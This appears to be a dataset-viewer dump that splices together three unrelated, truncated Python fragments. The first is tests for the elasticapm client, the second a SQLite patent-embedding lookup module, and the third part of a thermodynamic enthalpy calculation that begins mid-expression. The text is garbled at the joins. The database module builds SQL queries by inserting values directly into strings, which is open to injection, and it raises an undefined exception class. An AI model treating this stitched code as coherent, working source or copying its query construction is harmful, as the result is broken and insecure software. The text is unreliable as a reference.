input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<filename>tests/client/client_tests.py
# -*- coding: utf-8 -*-
import os
import platform
import sys
import time
import mock
import pytest
import elasticapm
from elasticapm.base import Client, ClientState
from elasticapm.conf.constants import KEYWORD_MAX_LENGTH
from elasticapm.transport.base import Transport
from elasticapm.utils import compat, encoding
def test_client_state_should_try_online():
state = ClientState()
assert state.should_try() is True
def test_client_state_should_try_new_error():
state = ClientState()
state.status = state.ERROR
state.last_check = time.time()
state.retry_number = 1
assert state.should_try() is False
def test_client_state_should_try_time_passed_error():
state = ClientState()
state.status = state.ERROR
state.last_check = time.time() - 10
state.retry_number = 1
assert state.should_try() is True
def test_client_state_set_fail():
state = ClientState()
state.set_fail()
assert state.status == state.ERROR
assert state.last_check is not None
assert state.retry_number == 1
def test_client_state_set_success():
state = ClientState()
state.status = state.ERROR
state.last_check = "foo"
state.retry_number = 0
state.set_success()
assert state.status == state.ONLINE
assert state.last_check is None
assert state.retry_number == 0
class DummyTransport(Transport):
def send(self, data, headers):
pass
@pytest.mark.parametrize("elasticapm_client", [{"environment": "production"}], indirect=True)
def test_service_info(elasticapm_client):
service_info = elasticapm_client.get_service_info()
assert service_info["name"] == elasticapm_client.config.service_name
assert service_info["environment"] == elasticapm_client.config.environment == "production"
assert service_info["language"] == {"name": "python", "version": platform.python_version()}
assert service_info["agent"]["name"] == "python"
def test_process_info(elasticapm_client):
with mock.patch.object(sys, "argv", ["a", "b", "c"]):
process_info = elasticapm_client.get_process_info()
assert process_info["pid"] == os.getpid()
if hasattr(os, "getppid"):
assert process_info["ppid"] == os.getppid()
else:
# Windows + Python 2.7
assert process_info["ppid"] is None
assert process_info["argv"] == ["a", "b", "c"]
def test_system_info(elasticapm_client):
system_info = elasticapm_client.get_system_info()
assert {"hostname", "architecture", "platform"} == set(system_info.keys())
def test_config_by_environment():
with mock.patch.dict("os.environ", {"ELASTIC_APM_SERVICE_NAME": "app", "ELASTIC_APM_SECRET_TOKEN": "token"}):
client = Client()
assert client.config.service_name == "app"
assert client.config.secret_token == "token"
assert client.config.disable_send is False
with mock.patch.dict("os.environ", {"ELASTIC_APM_DISABLE_SEND": "true"}):
client = Client()
assert client.config.disable_send is True
client.close()
def test_config_non_string_types():
"""
tests if we can handle non string types as configuration, e.g.
Value types from django-configuration
"""
class MyValue(object):
def __init__(self, content):
self.content = content
def __str__(self):
return str(self.content)
def __repr__(self):
return repr(self.content)
client = Client(server_url="localhost", service_name=MyValue("bar"), secret_token=MyValue("bay"))
assert isinstance(client.config.secret_token, compat.string_types)
assert isinstance(client.config.service_name, compat.string_types)
client.close()
@pytest.mark.parametrize(
"elasticapm_client", [{"transport_class": "tests.client.client_tests.DummyTransport"}], indirect=True
)
def test_custom_transport(elasticapm_client):
assert elasticapm_client._transport_class == DummyTransport
@pytest.mark.parametrize("elasticapm_client", [{"processors": []}], indirect=True)
def test_empty_processor_list(elasticapm_client):
assert elasticapm_client.processors == []
@pytest.mark.parametrize(
"sending_elasticapm_client",
[{"transport_class": "elasticapm.transport.http.Transport", "async_mode": False}],
indirect=True,
)
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_sync(should_try, sending_elasticapm_client):
sending_elasticapm_client.httpserver.code = 400
sending_elasticapm_client.httpserver.content = "go away"
should_try.return_value = True
logger = mock.Mock()
sending_elasticapm_client.error_logger.error = logger
# test error
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "foo"})
assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ERROR
assert len(logger.call_args_list) == 2
assert "go away" in logger.call_args_list[0][0][0]
assert "foo" in logger.call_args_list[1][0][1]
# test recovery
sending_elasticapm_client.httpserver.code = 202
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "foo"})
assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ONLINE
@mock.patch("elasticapm.transport.http.Transport.send")
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_sync_stdlib(should_try, http_send):
should_try.return_value = True
client = Client(
server_url="http://example.com",
service_name="app_name",
secret_token="secret",
transport_class="elasticapm.transport.http.Transport",
)
logger = mock.Mock()
client.error_logger.error = logger
# test error
http_send.side_effect = ValueError("oopsie")
client.send("http://example.com/api/store", **{"message": "oh no"})
assert client.state.status == client.state.ERROR
assert len(logger.call_args_list) == 1
assert "oopsie" in logger.call_args_list[0][0][1]
# test recovery
http_send.side_effect = None
client.send("http://example.com/api/store", **{"message": "oh no"})
assert client.state.status == client.state.ONLINE
client.close()
@pytest.mark.parametrize(
"sending_elasticapm_client",
[{"transport_class": "elasticapm.transport.http.AsyncTransport", "async_mode": True}],
indirect=True,
)
@mock.patch("elasticapm.base.ClientState.should_try")
def test_send_remote_failover_async(should_try, sending_elasticapm_client):
should_try.return_value = True
sending_elasticapm_client.httpserver.code = 400
logger = mock.Mock()
sending_elasticapm_client.error_logger.error = logger
# test error
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "oh no"})
sending_elasticapm_client.close()
assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ERROR
assert len(logger.call_args_list) == 2
assert "400" in logger.call_args_list[0][0][0]
assert "oh no" in logger.call_args_list[1][0][1]
# test recovery
sending_elasticapm_client.httpserver.code = 202
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, **{"message": "yay"})
sending_elasticapm_client.close()
assert sending_elasticapm_client.state.status == sending_elasticapm_client.state.ONLINE
@mock.patch("elasticapm.base.time.time")
def test_send(time, sending_elasticapm_client):
time.return_value = 1328055286.51
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
sending_elasticapm_client.close()
request = sending_elasticapm_client.httpserver.requests[0]
expected_headers = {
"Content-Type": "application/json",
"Content-Encoding": "deflate",
"Authorization": "Bearer %s" % sending_elasticapm_client.config.secret_token,
"User-Agent": "elasticapm-python/%s" % elasticapm.VERSION,
}
seen_headers = dict(request.headers)
for k, v in expected_headers.items():
assert seen_headers[k] == v
assert request.content_length == 22
@pytest.mark.parametrize("sending_elasticapm_client", [{"disable_send": True}], indirect=True)
@mock.patch("elasticapm.base.time.time")
def test_send_not_enabled(time, sending_elasticapm_client):
time.return_value = 1328055286.51
assert sending_elasticapm_client.config.disable_send
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
sending_elasticapm_client.close()
assert len(sending_elasticapm_client.httpserver.requests) == 0
@pytest.mark.parametrize(
"sending_elasticapm_client",
[{"transport_class": "elasticapm.transport.http.Transport", "async_mode": False}],
indirect=True,
)
@mock.patch("elasticapm.base.Client._collect_transactions")
def test_client_shutdown_sync(mock_traces_collect, sending_elasticapm_client):
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
sending_elasticapm_client.close()
assert len(sending_elasticapm_client.httpserver.requests) == 1
assert mock_traces_collect.call_count == 1
assert len(sending_elasticapm_client._transports) == 0
@pytest.mark.parametrize(
"sending_elasticapm_client",
[{"transport_class": "elasticapm.transport.http.AsyncTransport", "async_mode": True}],
indirect=True,
)
@mock.patch("elasticapm.base.Client._collect_transactions")
def test_client_shutdown_async(mock_traces_collect, sending_elasticapm_client):
sending_elasticapm_client.send(sending_elasticapm_client.config.server_url, foo="bar")
sending_elasticapm_client.close()
assert mock_traces_collect.call_count == 1
assert len(sending_elasticapm_client.httpserver.requests) == 1
assert len(sending_elasticapm_client._transports) == 0
def test_encode_decode(elasticapm_client):
data = {"foo": "bar"}
encoded = elasticapm_client.encode(data)
assert isinstance(encoded, compat.binary_type)
assert data == elasticapm_client.decode(encoded)
def test_explicit_message_on_exception_event(elasticapm_client):
try:
raise ValueError("foo")
except ValueError:
elasticapm_client.capture("Exception", message="foobar")
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert event["exception"]["message"] == "foobar"
@pytest.mark.parametrize(
"elasticapm_client",
[{"include_paths": ("tests",), "local_var_max_length": 20, "local_var_list_max_length": 10}],
indirect=True,
)
def test_exception_event(elasticapm_client):
try:
a_local_var = 1
a_long_local_var = 100 * "a"
a_long_local_list = list(range(100))
raise ValueError("foo")
except ValueError:
elasticapm_client.capture("Exception")
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert "exception" in event
exc = event["exception"]
assert exc["message"] == "ValueError: foo"
assert exc["type"] == "ValueError"
assert exc["module"] == ValueError.__module__ # this differs in some Python versions
assert "stacktrace" in exc
frames = exc["stacktrace"]
assert len(frames) == 1
frame = frames[0]
assert frame["abs_path"], __file__.replace(".pyc" == ".py")
assert frame["filename"] == os.path.join("tests", "client", "client_tests.py")
assert frame["module"] == __name__
assert frame["function"] == "test_exception_event"
assert not frame["library_frame"]
assert frame["vars"]["a_local_var"] == 1
assert len(frame["vars"]["a_long_local_var"]) == 20
assert len(frame["vars"]["a_long_local_list"]) == 12
assert frame["vars"]["a_long_local_list"][-1] == "(90 more elements)"
assert "timestamp" in event
assert "log" not in event
# check that only frames from `tests` module are not marked as library frames
assert all(
frame["library_frame"] or frame["module"].startswith("tests") for frame in event["exception"]["stacktrace"]
)
@pytest.mark.parametrize(
"elasticapm_client",
[{"include_paths": ("*/tests/*",), "local_var_max_length": 20, "local_var_list_max_length": 10}],
indirect=True,
)
def test_message_event(elasticapm_client):
a_local_var = 1
a_long_local_var = 100 * "a"
a_long_local_list = list(range(100))
elasticapm_client.capture("Message", message="test")
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert event["log"]["message"] == "test"
assert "stacktrace" not in event
assert "timestamp" in event
assert "stacktrace" in event["log"]
# check that only frames from `tests` module are not marked as library frames
for frame in event["log"]["stacktrace"]:
assert frame["library_frame"] or frame["module"].startswith(("tests", "__main__")), (
frame["module"],
frame["abs_path"],
)
frame = event["log"]["stacktrace"][0]
assert frame["vars"]["a_local_var"] == 1
assert len(frame["vars"]["a_long_local_var"]) == 20
assert len(frame["vars"]["a_long_local_list"]) == 12
assert frame["vars"]["a_long_local_list"][-1] == "(90 more elements)"
def test_param_message_event(elasticapm_client):
elasticapm_client.capture("Message", param_message={"message": "test %s %d", "params": ("x", 1)})
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert event["log"]["message"] == "test x 1"
assert event["log"]["param_message"] == "test %s %d"
def test_message_with_percent(elasticapm_client):
elasticapm_client.capture("Message", message="This works 100% of the time")
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert event["log"]["message"] == "This works 100% of the time"
assert event["log"]["param_message"] == "This works 100% of the time"
def test_logger(elasticapm_client):
elasticapm_client.capture("Message", message="test", logger_name="test")
assert len(elasticapm_client.events) == 1
event = elasticapm_client.events.pop(0)["errors"][0]
assert event["log"]["logger_name"] == "test"
assert "timestamp" in event
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_metrics_collection(should_collect, sending_elasticapm_client):
should_collect.return_value = False
for i in range(7):
sending_elasticapm_client.begin_transaction("transaction.test")
sending_elasticapm_client.end_transaction("test-transaction", 200)
assert len(sending_elasticapm_client.transaction_store) == 7
assert len(sending_elasticapm_client.httpserver.requests) == 0
should_collect.return_value = True
sending_elasticapm_client.begin_transaction("transaction.test")
sending_elasticapm_client.end_transaction("my-other-transaction", 200)
assert len(sending_elasticapm_client.httpserver.requests) == 1
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_call_end_twice(should_collect, elasticapm_client):
should_collect.return_value = False
elasticapm_client.begin_transaction("celery")
elasticapm_client.end_transaction("test-transaction", 200)
elasticapm_client.end_transaction("test-transaction", 200)
@mock.patch("elasticapm.base.is_master_process")
def test_client_uses_sync_mode_when_master_process(is_master_process):
# when in the master process, the client should use the non-async
# HTTP transport, even if async_mode is True
is_master_process.return_value = True
client = Client(server_url="http://example.com", service_name="app_name", secret_token="secret", async_mode=True)
transport = client._get_transport(compat.urlparse.urlparse("http://exampe.com"))
assert transport.async_mode is False
@pytest.mark.parametrize("elasticapm_client", [{"verify_server_cert": False}], indirect=True)
def test_client_disables_ssl_verification(elasticapm_client):
assert not elasticapm_client.config.verify_server_cert
assert not elasticapm_client._get_transport(compat.urlparse.urlparse("https://example.com"))._verify_server_cert
@pytest.mark.parametrize(
"elasticapm_client", [{"transactions_ignore_patterns": ["^OPTIONS", "views.api.v2"]}], indirect=True
)
@mock.patch("elasticapm.base.TransactionsStore.should_collect")
def test_ignore_patterns(should_collect, elasticapm_client):
should_collect.return_value = False
elasticapm_client.begin_transaction("web")
elasticapm_client.end_transaction("OPTIONS views.healthcheck", 200)
elasticapm_client.begin_transaction("web")
elasticapm_client.end_transaction("GET views.users", 200)
transactions = elasticapm_client.transaction_store.get_all()
assert len(transactions) == 1
assert transactions[0]["name"] == "GET views.users"
@pytest.mark.parametrize(
"elasticapm_client", [{"transactions_ignore_patterns": ["^OPTIONS", "views.api.v2"]}], indirect=True
)
def test_ignore_patterns_with_none_transaction_name(elasticapm_client):
elasticapm_client.begin_transaction("web")
t = elasticapm_client.end_transaction(None, 200)
assert t.name == ""
@pytest.mark.parametrize("sending_elasticapm_client", [{"disable_send": True}], indirect=True)
def test_disable_send(sending_elasticapm_client):
assert sending_elasticapm_client.config.disable_send
sending_elasticapm_client.capture("Message", message="test", data={"logger": "test"})
assert len(sending_elasticapm_client.httpserver.requests) == 0
@pytest.mark.parametrize("elasticapm_client", [{"service_name": "@%&!"}], indirect=True)
def test_invalid_service_name_disables_send(elasticapm_client):
assert len(elasticapm_client.config.errors) == 1
assert "SERVICE_NAME" in elasticapm_client.config.errors
assert elasticapm_client.config.disable_send
@pytest.mark.parametrize(
"elasticapm_client", [{"service_name": "foo", "config": {"TRANSPORT_CLASS": None}}], indirect=True
)
def test_empty_transport_disables_send(elasticapm_client):
assert len(elasticapm_client.config.errors) == 1
assert "TRANSPORT_CLASS" in elasticapm_client.config.errors
assert elasticapm_client.config.disable_send
@pytest.mark.parametrize("elasticapm_client", [{"flush_interval": 2}], indirect=True)
def test_send_timer(elasticapm_client):
assert elasticapm_client._send_timer is None
assert elasticapm_client.config.flush_interval == 2
elasticapm_client.begin_transaction("test_type")
elasticapm_client.end_transaction("test")
assert elasticapm_client._send_timer is not None
assert elasticapm_client._send_timer.interval == 2
assert elasticapm_client._send_timer.is_alive()
elasticapm_client.close()
assert not elasticapm_client._send_timer.is_alive()
@pytest.mark.parametrize(
"elasticapm_client",
[
{"collect_local_variables": "errors"},
{"collect_local_variables": "transactions"},
{"collect_local_variables": "all"},
{"collect_local_variables": "something"},
],
indirect=True,
)
def test_collect_local_variables_errors(elasticapm_client):
mode = elasticapm_client.config.collect_local_variables
try:
1 / 0
except ZeroDivisionError:
elasticapm_client.capture_exception()
event = elasticapm_client.events[0]["errors"][0]
if mode in ("errors", "all"):
assert "vars" in event["exception"]["stacktrace"][0], mode
else:
assert "vars" not in event["exception"]["stacktrace"][0], mode
@pytest.mark.parametrize(
"elasticapm_client",
[
{"source_lines_error_library_frames": 0, "source_lines_error_app_frames": 0},
{"source_lines_error_library_frames": 1, "source_lines_error_app_frames": 1},
{"source_lines_error_library_frames": 7, "source_lines_error_app_frames": 3},
],
indirect=True,
)
def test_collect_source_errors(elasticapm_client):
library_frame_context = elasticapm_client.config.source_lines_error_library_frames
in_app_frame_context = elasticapm_client.config.source_lines_error_app_frames
try:
import json, datetime
json.dumps(datetime.datetime.now())
except TypeError:
elasticapm_client.capture_exception()
event = elasticapm_client.events[0]["errors"][0]
in_app_frame = event["exception"]["stacktrace"][0]
library_frame = event["exception"]["stacktrace"][1]
assert not in_app_frame["library_frame"]
assert library_frame["library_frame"]
if library_frame_context:
assert "context_line" in library_frame, library_frame_context
assert "pre_context" in library_frame, library_frame_context
assert "post_context" in library_frame, library_frame_context
lines = len([library_frame["context_line"]] + library_frame["pre_context"] + library_frame["post_context"])
assert lines == library_frame_context, library_frame_context
else:
assert "context_line" not in library_frame, library_frame_context
assert "pre_context" not in library_frame, library_frame_context
assert "post_context" not in library_frame, library_frame_context
if in_app_frame_context:
assert "context_line" in in_app_frame, in_app_frame_context
assert | |
# -*- coding: utf-8 -*-
"""
@File: database.py
@Description: This is a module for different database operations and
to provide a fast lookup.
This application,
1. Open/Close a SQLite database connection
2. Create a new SQLite database
3. Create a new SQLite table
4. Insert records into SQLite table
5. Create a new index on SQLite table for efficient lookup
6. Drop an index
7. Retrieve records from SQLite table
for a provided condition
8. Find out the total number of records in the database
9. Find out the table schema
10. Save/Load database to/from disk
11. Perform fast lookup on database
@Author: <NAME>
@EMail: <EMAIL>
@Created_on: 04/05/2017
@License Copyright [2017] [Chetan Borse]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
@python_version: 3.5
===============================================================================
"""
import os
import math
import time
import logging
from functools import partial
from multiprocessing import Pool
from multiprocessing import Lock
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import numpy as np
import sqlite3
from Configuration import config
# Set logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s [%(levelname)s] %(message)s',)
log = logging.getLogger("Database")
# Global variables
PATENT_EMBEDDING_DATABASE = config.PATENT_EMBEDDING_DATABASE
PATENT_EMBEDDING_TABLE = config.PATENT_EMBEDDING_TABLE
PRIMARY_KEY = config.PRIMARY_KEY
FIELDS = config.FIELDS
PATENT_EMBEDDING_INDEX = config.PATENT_EMBEDDING_INDEX
PATENT_CLUSTERING_PATH = config.PATENT_CLUSTERING_PATH
PATENT_MATRIX = config.PATENT_MATRIX
LABELS = config.LABELS
CLASSES = config.CLASSES
DISABLE_PATENT_CATEGORIES = config.DISABLE_PATENT_CATEGORIES
# Lock for synchronized access
LOCK = Lock()
class DatabaseError(Exception):
pass
class FileHandlerError(Exception):
pass
class Database(object):
"""
This is a class for different database operations.
This class,
1. Open/Close a SQLite database connection
2. Create a new SQLite database
3. Create a new SQLite table
4. Insert records into SQLite table
5. Create a new index on SQLite table for efficient lookup
6. Drop an index
7. Retrieve records from SQLite table
for a provided condition
8. Find out the total number of records in the database
9. Find out the table schema
10. Save/Load database to/from disk
"""
def __init__(self, verbose=False):
self.connection = None
self.cursor = None
self.verbose = verbose
def connect(self,
database=PATENT_EMBEDDING_DATABASE,
in_memory=True,
load_from=None):
"""
Connect to a SQLite database.
"""
try:
if in_memory:
self.connection = sqlite3.connect(':memory:')
else:
self.connection = sqlite3.connect(database)
self.cursor = self.connection.cursor()
if load_from is not None:
with open(load_from, "r") as f:
self.cursor.executescript(f.read())
self.connection.commit()
except IOError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.OperationalError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.Error as e:
raise DatabaseError("Database application failed with: %s" % e)
except Exception as e:
raise DatabaseError("Database application failed with: %s" % e)
def create_table(self,
table=PATENT_EMBEDDING_TABLE,
primary_column=PRIMARY_KEY,
other_columns=FIELDS):
"""
Create a new SQLite table.
"""
try:
self.cursor.execute('CREATE TABLE {tn} ({f} {t} NOT NULL PRIMARY KEY)' \
.format(tn=table,
f=primary_column[0], t=primary_column[1]))
for column, type in other_columns:
self.cursor.execute("ALTER TABLE {tn} ADD COLUMN '{f}' {t}" \
.format(tn=table, f=column, t=type))
except sqlite3.OperationalError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.Error as e:
raise DatabaseError("Database application failed with: %s" % e)
except Exception as e:
raise DatabaseError("Database application failed with: %s" % e)
self.connection.commit()
def insert(self,
table=PATENT_EMBEDDING_TABLE,
record=[("PatentName", None),
("DocumentEmbedding", None),
("PatentCategory", "UNKNOWN")]):
"""
Insert records into SQLite table.
"""
query = "INSERT OR IGNORE INTO {tn} ({f}) VALUES ({v})"
columns = map(lambda x: x[0], record)
values = map(lambda x: '\''+str(x[1])+'\'', record)
columns = ", ".join(columns)
values = ", ".join(values)
query = query.format(tn=table, f=columns, v=values)
self._execute_query(query)
self.connection.commit()
def create_index(self,
index=PATENT_EMBEDDING_INDEX,
table=PATENT_EMBEDDING_TABLE,
index_by_column=PRIMARY_KEY[0]):
"""
Create a new index on SQLite table for efficient lookup.
"""
query = 'CREATE UNIQUE INDEX {i} ON {tn} ({f})'.format(i=index,
tn=table,
f=index_by_column)
self._execute_query(query)
self.connection.commit()
def drop_index(self, index):
"""
Drop an index from a SQLite table.
"""
query = 'DROP INDEX {i}'.format(i=index)
self._execute_query(query)
self.connection.commit()
def get(self,
table=PATENT_EMBEDDING_TABLE,
index=PATENT_EMBEDDING_INDEX,
required_columns=["*"],
condition=""):
"""
Retrieve records from SQLite table for a provided condition.
"""
query = "SELECT {f} FROM {tn} INDEXED BY {i} WHERE {c}"
query = query.format(f=", ".join(required_columns),
tn=table,
i=index,
c=condition)
self._execute_query(query)
records = []
while True:
partial_records = self.cursor.fetchmany(True)
if not partial_records:
break
for record in partial_records:
if self.verbose:
log.debug("%r", record)
records.append(record)
return records
def get_total_records(self, table):
"""
Returns the total number of records in the database.
"""
query = 'SELECT COUNT(*) FROM {}'.format(table)
self._execute_query(query)
total_records = self.cursor.fetchall()
if self.verbose:
log.info('Total records: {}'.format(total_records[0][0]))
return total_records[0][0]
def get_table_schema(self, table):
"""
Returns the table schema.
"""
query = 'PRAGMA TABLE_INFO({})'.format(table)
self._execute_query(query)
table_schema = self.cursor.fetchall()
if self.verbose:
log.info("ID, Name, Type, Not_Null, Default_Value, Primary_Key")
for column in table_schema:
log.info(column)
return table_schema
def close(self, save_to=None):
"""
Close connection to the database.
"""
try:
if self.connection:
if save_to is not None:
if not os.path.exists(save_to.rsplit(os.sep, 1)[0]):
raise PathNotFoundError("Path does not exist: %s"
% save_to.rsplit(os.sep, 1)[0])
with open(save_to, 'w') as f:
for line in self.connection.iterdump():
f.write('%s\n' % line)
self.connection.close()
except IOError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.OperationalError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.Error as e:
raise DatabaseError("Database application failed with: %s" % e)
except Exception as e:
raise DatabaseError("Database application failed with: %s" % e)
def _execute_query(self, query):
"""
Execute SQLite query.
"""
try:
with LOCK:
self.cursor.execute(query)
except sqlite3.ProgrammingError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.IntegrityError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.OperationalError as e:
raise DatabaseError("Database application failed with: %s" % e)
except sqlite3.Error as e:
raise DatabaseError("Database application failed with: %s" % e)
except Exception as e:
raise DatabaseError("Database application failed with: %s" % e)
class FileHandler(object):
"""
Class for saving records retrieved from the database
in a synchronized fashion.
"""
@staticmethod
def write(records, filename, mode):
"""
Save records retrieved from the database in a synchronized fashion
using mutex lock on shared file resource.
"""
with LOCK:
try:
with open(filename, mode) as f:
f.write(records)
f.flush()
os.fsync(f.fileno())
except IOError as e:
raise FileHandlerError("FileHandler failed: %s" % filename)
def Lookup(database,
table=PATENT_EMBEDDING_TABLE,
index=PATENT_EMBEDDING_INDEX,
required_columns=["*"],
search_on=PRIMARY_KEY[0],
save=True,
patents=list()):
"""
Perform lookup on database.
"""
condition = "{s} IN ({i})"
# condition = "{s} IN ({i}) ORDER BY FIELD ({o})"
patents = map(lambda x: '\''+str(x)+'\'', patents)
patents = ",".join(patents)
condition = condition.format(s=search_on, i=patents)
# condition = condition.format(s=search_on, i=patents, o=patents)
records = database.get(table, index, required_columns, condition)
if save:
SaveRecords(records)
return records
def FastLookup(database,
table=PATENT_EMBEDDING_TABLE,
index=PATENT_EMBEDDING_INDEX,
required_columns=["*"],
search_on=PRIMARY_KEY[0],
patents=list(),
total_processes=1,
save=True,
path=os.getcwd(),
return_from=False):
"""
Perform fast lookup on database.
"""
chunk_size = math.ceil(float(len(patents)) / total_processes)
if chunk_size == 0:
chunk_size = 1
with Pool(processes=total_processes) as pool:
f = partial(Lookup,
database, table, index, required_columns, search_on, save)
result = pool.map(f, GetChunks(patents, size=chunk_size))
if return_from:
return result
def GetChunks(data, size=None):
"""
Get chunks of the data.
"""
if size == None:
size = len(data)
start = 0
end = size
chunks = []
while start < len(data):
chunks.append(data[start:end])
start = end
end += size
if end > len(data):
end = len(data)
return chunks
def SaveRecords(records):
"""
Save records retrieved from the database.
"""
patent_names = map(lambda x: x[0], records)
patent_names = filter(None, patent_names)
patent_names = "\n".join(patent_names)
document_embeddings = map(lambda x: x[1], records)
document_embeddings = filter(None, document_embeddings)
document_embeddings = "\n".join(document_embeddings)
if not DISABLE_PATENT_CATEGORIES:
patent_categories = map(lambda x: x[2], records)
patent_categories = filter(None, patent_categories)
patent_categories = "\n".join(patent_categories)
if os.path.exists(PATENT_CLUSTERING_PATH):
if patent_names:
FileHandler.write(patent_names+"\n", LABELS, "a")
if document_embeddings:
FileHandler.write(document_embeddings.encode()+b"\n",
PATENT_MATRIX,
"ab")
if (not DISABLE_PATENT_CATEGORIES and patent_categories):
FileHandler.write(patent_categories+"\n", CLASSES, "a")
if __name__ == '__main__':
# Database: write operations
db = Database(verbose=True)
db.connect(in_memory=True)
db.create_table(table=PATENT_EMBEDDING_TABLE,
primary_column=PRIMARY_KEY,
other_columns=FIELDS)
total_records = 1000
dimension = 500
for i in range(total_records):
default_embedding = np.zeros((dimension,), dtype=np.float32)
document_embedding = " ".join(map(str, default_embedding))
record = [("PatentName", str(i)),
("DocumentEmbedding", document_embedding),
("PatentCategory", "UNKNOWN")]
db.insert(table=PATENT_EMBEDDING_TABLE, record=record)
db.create_index(index=PATENT_EMBEDDING_INDEX,
table=PATENT_EMBEDDING_TABLE,
index_by_column=PRIMARY_KEY[0])
db.get_total_records(PATENT_EMBEDDING_TABLE)
db.get_table_schema(PATENT_EMBEDDING_TABLE)
db.close(save_to=PATENT_EMBEDDING_DATABASE)
# Database: read operations
db = Database(verbose=True)
db.connect(in_memory=True, load_from=PATENT_EMBEDDING_DATABASE)
total_patents = 50
patents = [str(i+5) for i in range(total_patents)]
dimension = 500
try:
FileHandler.write((b"%d %d\n" % (total_patents, dimension)),
PATENT_MATRIX,
"ab")
except IOError as e:
raise FileHandlerError()
start_time = time.time()
Lookup(db,
table=PATENT_EMBEDDING_TABLE,
index=PATENT_EMBEDDING_INDEX,
search_on=PRIMARY_KEY[0],
save=True,
patents=patents)
# | |
= 1/PropsSI('DMOLAR', 'T', T, 'Q', 0, fluid)
Vm2 = 1/PropsSI('DMOLAR', 'T', T, 'P', P2, fluid)
dH = PropsSI('HMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('HMOLAR', 'T', T, 'Q', 0, fluid)
def to_int(P):
Vm = 1/PropsSI('DMOLAR', 'T', T, 'P', P, fluid)
alpha = PropsSI('ISOBARIC_EXPANSION_COEFFICIENT', 'T', T, 'P', P, fluid)
return Vm -alpha*T*Vm
quad(to_int, Psat, P2, epsabs=1.49e-14, epsrel=1.49e-14)[0]/dH
'''
if self.use_IG_Cp:
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
try:
dPsats_dT = self._dPsats_dT
except AttributeError:
dPsats_dT = self.dPsats_dT()
try:
Vms_sat = self._Vms_sat
except AttributeError:
Vms_sat = self.Vms_sat()
try:
dVms_sat_dT = self._Vms_sat_dT
except AttributeError:
dVms_sat_dT = self.dVms_sat_dT()
failed_dPsat_dT = False
try:
H = 0.0
for i in cmps:
dV_vap = R*T/Psats[i] - Vms_sat[i]
# print( R*T/Psats[i] , Vms_sat[i])
# ratio of der to value might be easier?
dS_vap = dPsats_dT[i]*dV_vap
# print(dPsats_dT[i]*dV_vap)
Hvap = T*dS_vap
H += zs[i]*(Cpig_integrals_pure[i] - Hvap)
except ZeroDivisionError:
failed_dPsat_dT = True
if failed_dPsat_dT or isinf(H):
# Handle the case where vapor pressure reaches zero - needs special implementations
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
H = 0.0
for i in cmps:
# dV_vap = R*T/Psats[i] - Vms_sat[i]
# dS_vap = dPsats_dT[i]*dV_vap
Hvap = T*dPsats_dT_over_Psats[i]*RT
H += zs[i]*(Cpig_integrals_pure[i] - Hvap)
if self.use_Tait:
dH_dP_integrals_Tait = self.dH_dP_integrals_Tait()
for i in cmps:
H += zs[i]*dH_dP_integrals_Tait[i]
elif self.use_Poynting:
for i in cmps:
# This bit is the differential with respect to pressure
# dP = max(0.0, P - Psats[i]) # Breaks thermodynamic consistency
dP = P - Psats[i]
H += zs[i]*dP*(Vms_sat[i] - T*dVms_sat_dT[i])
else:
Psats = self.Psats()
Vms_sat = self.Vms_sat()
dVms_sat_dT = self.dVms_sat_dT()
dPsats_dT = self.dPsats_dT()
Hvaps_T_ref = self.Hvaps_T_ref()
Cpl_integrals_pure = self._Cpl_integrals_pure()
dVms_sat_dT_T_ref = self.dVms_sat_dT_T_ref()
Vms_sat_T_ref = self.Vms_sat_T_ref()
Psats_T_ref = self.Psats_T_ref()
Hvaps = self.Hvaps()
H = 0.0
for i in self.cmps:
H += zs[i]*(Cpl_integrals_pure[i] - Hvaps_T_ref[i]) #
# If we can use the liquid heat capacity and prove its consistency
# This bit is the differential with respect to pressure
dP = P - Psats_T_ref[i]
H += zs[i]*dP*(Vms_sat_T_ref[i] - T_REF_IG*dVms_sat_dT_T_ref[i])
else:
Hvaps = self.Hvaps()
for i in self.cmps:
H += zs[i]*(Cpig_integrals_pure[i] - Hvaps[i])
H += self.GibbsExcessModel.HE()
# self._H = H
return H
def H(self):
try:
return self._H
